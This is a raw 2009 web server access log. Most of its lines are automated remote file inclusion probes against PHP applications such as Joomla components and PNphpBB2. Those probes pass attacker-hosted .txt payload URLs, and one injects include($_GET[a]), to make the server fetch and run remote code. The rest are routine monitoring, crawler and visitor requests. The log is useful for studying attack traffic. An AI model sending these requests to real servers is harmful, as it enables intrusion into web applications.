65.254.32.2 - - [20/Jul/2009:03:15:38 -0400] "GET //trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:15:39 -0400] "GET /logs/access_log.Q109070400//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:15:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.107.223.38 - - [20/Jul/2009:03:16:07 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:16:36 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:16:36 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:16:36 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:03:16:57 -0400] "GET /logs/access_log.Q109061600//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:03:16:57 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:17:16 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:17:16 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.78.231 - - [20/Jul/2009:03:18:02 -0400] "GET /logs/error_log.Q108012000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.195.150.228 - - [20/Jul/2009:03:19:20 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
124.0.139.129 - - [20/Jul/2009:03:19:34 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:20:15 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:20:20 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:20:26 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:28 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:29 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:29 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:20:30 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:20:30 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:20:30 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:34 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:34 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:34 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:47 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:47 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:20:47 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:20:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.128.142.219 - - [20/Jul/2009:03:21:12 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:21:12 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:21:13 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:21:16 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:21:16 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:21:36 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:21:36 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:21:36 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:21:37 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:21:46 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:21:46 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:21:50 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:22:02 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:03:22:04 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
62.128.142.219 - - [20/Jul/2009:03:22:16 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:22:28 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:22:30 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:22:30 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:22:30 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.128.251.111 - - [20/Jul/2009:03:23:04 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
190.128.251.111 - - [20/Jul/2009:03:23:04 -0400] "GET /index.php?sayfa=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
190.128.251.111 - - [20/Jul/2009:03:23:04 -0400] "GET /logs/index.php?sayfa=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
62.128.142.219 - - [20/Jul/2009:03:23:05 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:05 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:06 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:13 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:40 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:40 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:41 -0400] "GET //components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:03:23:46 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_flyspray/startdown.php?file=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:23:51 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:23:51 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:23:51 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:23:51 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:03:23:52 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:24:03 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:03:24:28 -0400] "GET /index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
82.195.150.228 - - [20/Jul/2009:03:24:39 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:24:39 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
201.232.54.48 - - [20/Jul/2009:03:24:41 -0400] "GET /logs/access_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jul/2009:03:24:41 -0400] "GET /logs/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
124.0.139.129 - - [20/Jul/2009:03:24:53 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:24:58 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:25:39 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:25:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.195.150.228 - - [20/Jul/2009:03:26:29 -0400] "GET /logs/error_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
200.204.85.68 - - [20/Jul/2009:03:27:00 -0400] "GET /logs/index.php?arquivo=http://www.msgwebmailcontrol.com/botp/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:27:32 -0400] "GET /error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:27:32 -0400] "GET /logs/error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:27:33 -0400] "GET /logs/access_log.Q109051400/error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:28:06 -0400] "GET /logs/access_log.Q109051800/error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.55.105.237 - - [20/Jul/2009:03:28:45 -0400] "GET /logs/error_log.Q108052500 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
68.104.87.8 - - [20/Jul/2009:03:30:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:30:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:30:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:30:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
82.195.150.228 - - [20/Jul/2009:03:30:35 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:30:35 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
123.143.98.5 - - [20/Jul/2009:03:30:46 -0400] "GET /logs/access_log.Q109051400%20%20/error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:03:30:51 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
195.186.64.207 - - [20/Jul/2009:03:30:53 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:30:53 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:30:53 -0400] "GET /logs/access_log.Q109052100////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:30:56 -0400] "GET /logs/access_log.Q109051800%20%20/error.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:08 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:09 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:13 -0400] "GET /logs/access_log.Q109052100////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:31:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.186.64.207 - - [20/Jul/2009:03:31:32 -0400] "GET /logs/access_log.Q109052100////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:32 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:33 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:33 -0400] "GET /logs/access_log.Q109051200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:48 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:48 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:48 -0400] "GET /logs/access_log.Q109052100////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:31:54 -0400] "GET /logs/access_log.Q109051200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:32:08 -0400] "GET /logs/access_log.Q109051200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:03:32:54 -0400] "GET /logs/error_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
195.186.64.207 - - [20/Jul/2009:03:33:12 -0400] "GET /logs/access_log.Q109051200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
68.104.87.8 - - [20/Jul/2009:03:33:23 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:33:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:33:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
68.104.87.8 - - [20/Jul/2009:03:33:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.186.64.207 - - [20/Jul/2009:03:33:51 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:33:53 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:33:55 -0400] "GET /logs/access_log.Q109052100%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:34:39 -0400] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 454 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:34:40 -0400] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 200 10269 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:34:40 -0400] "GET /logs/access_log.Q109052100%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
83.16.182.130 - - [20/Jul/2009:03:35:21 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
83.16.182.130 - - [20/Jul/2009:03:35:21 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
